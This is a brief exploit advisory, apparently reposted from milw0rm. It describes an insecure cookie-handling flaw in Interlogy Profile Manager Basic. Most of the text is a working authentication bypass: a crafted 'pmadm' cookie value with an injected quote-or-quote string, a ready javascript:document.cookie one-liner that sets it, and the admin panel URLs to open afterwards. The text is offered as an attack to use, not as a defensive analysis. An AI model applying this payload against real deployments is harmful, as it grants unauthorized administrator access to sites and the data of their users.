İnterlogy Profile Manager Basic Insecure Cookie Handling Vulnerability

Kaynak: http://www.milw0rm.com/exploits/8895


Desc :

Normal Login For Cookie

Pmadm=dGVzdA;

if ý do this :

Pmadm=dGVzd(write any thing);

Example :

pmadm=dGVzdz;

or

pmadm=dGVzd123231212313;

Not Login

if ý do wthis:

Pmadm=dGVzd ' or ';

Boom this Loggin

Exploit :

javascript:document.cookie = "pmadm=dGVzd ' or '; path=/";

After You Go Here :

http://demo.interlogy.com/pm3/cgi/admin.cgi?action=edittemp

or http://demo.interlogy.com/pm3/cgi/admin.cgi?action=users